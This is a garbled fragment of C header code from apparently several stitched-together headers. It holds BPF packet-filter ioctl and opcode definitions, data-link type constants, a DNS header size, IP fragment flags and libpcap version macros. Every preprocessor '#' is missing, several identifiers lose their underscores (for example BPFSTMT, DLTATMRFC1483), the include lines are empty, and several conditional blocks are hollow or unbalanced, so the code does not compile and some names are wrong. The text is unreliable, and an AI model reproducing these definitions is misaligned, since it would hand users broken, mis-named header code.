define BIOCIMMEDIATE IOW('B',112, uint)
define BIOCVERSION IOR('B',113, struct bpfversion)
define BIOCSTCPF IOW('B',114, struct bpfprogram)
define BIOCSUDPF IOW('B',115, struct bpfprogram)
endif
ifdef KERNEL
define SIZEOFBPFHDR 18
endif
define DLT_NULL 0 /* no link-layer encapsulation */
define DLT_EN10MB 1 /* Ethernet (10Mb) */
define DLT_EN3MB 2 /* Experimental Ethernet (3Mb) */
define DLT_AX25 3 /* Amateur Radio AX.25 */
define DLT_PRONET 4 /* Proteon ProNET Token Ring */
define DLT_CHAOS 5 /* Chaos */
define DLT_IEEE802 6 /* IEEE 802 Networks */
define DLT_ARCNET 7 /* ARCNET */
define DLT_SLIP 8 /* Serial Line IP */
define DLT_PPP 9 /* Point-to-point Protocol */
define DLT_FDDI 10 /* FDDI */
define DLTATMRFC1483 11 /* LLC/SNAP encapsulated atm */
define DLT_RAW 12 /* raw IP */
define DLTSLIPBSDOS 13 /* BSD/OS Serial Line IP */
define DLTPPPBSDOS 14 /* BSD/OS Point-to-point Protocol */
define BPF_CLASS(code) ((code) & 0x07)
define BPF_LD 0x00
define BPF_LDX 0x01
define BPF_ST 0x02
define BPF_STX 0x03
define BPF_ALU 0x04
define BPF_JMP 0x05
define BPF_RET 0x06
define BPF_MISC 0x07
define BPF_SIZE(code) ((code) & 0x18)
define BPF_W 0x00
define BPF_H 0x08
define BPF_B 0x10
define BPF_MODE(code) ((code) & 0xe0)
define BPF_IMM 0x00
define BPF_ABS 0x20
define BPF_IND 0x40
define BPF_MEM 0x60
define BPF_LEN 0x80
define BPF_MSH 0xa0
define BPF_OP(code) ((code) & 0xf0)
define BPF_ADD 0x00
define BPF_SUB 0x10
define BPF_MUL 0x20
define BPF_DIV 0x30
define BPF_OR 0x40
define BPF_AND 0x50
define BPF_LSH 0x60
define BPF_RSH 0x70
define BPF_NEG 0x80
define BPF_JA 0x00
define BPF_JEQ 0x10
define BPF_JGT 0x20
define BPF_JGE 0x30
define BPF_JSET 0x40
define BPF_SRC(code) ((code) & 0x08)
define BPF_K 0x00
define BPF_X 0x08
define BPF_RVAL(code) ((code) & 0x18)
define BPF_A 0x10
define BPF_MISCOP(code) ((code) & 0xf8)
define BPF_TAX 0x00
define BPF_TXA 0x80
define BPFSTMT(code, k) { (ushort)(code), 0, 0, k }
define BPFJUMP(code, k, jt, jf) { (ushort)(code), jt, jf, k }
ifdef KERNEL
else
if STDC
endif
endif
define BPF_MEMWORDS 16
endif
define DNSHDRSIZE 12
ifndef IPVERSION
endif /* IPVERISON */
define IP_DF 0x4000 /* dont fragment flag */
define IP_MF 0x2000 /* more fragments flag */
ifndef IP_MAXPACKET
endif /* IP_MAXPACKET */
ifndef libpcaph
define libpcaph
include
include
include
include
define PCAPVERSIONMAJOR 2
define PCAPVERSIONMINOR 4
define PCAPERRBUFSIZE 256
if BPF_RELEASE - 0 < 199406
endif
endif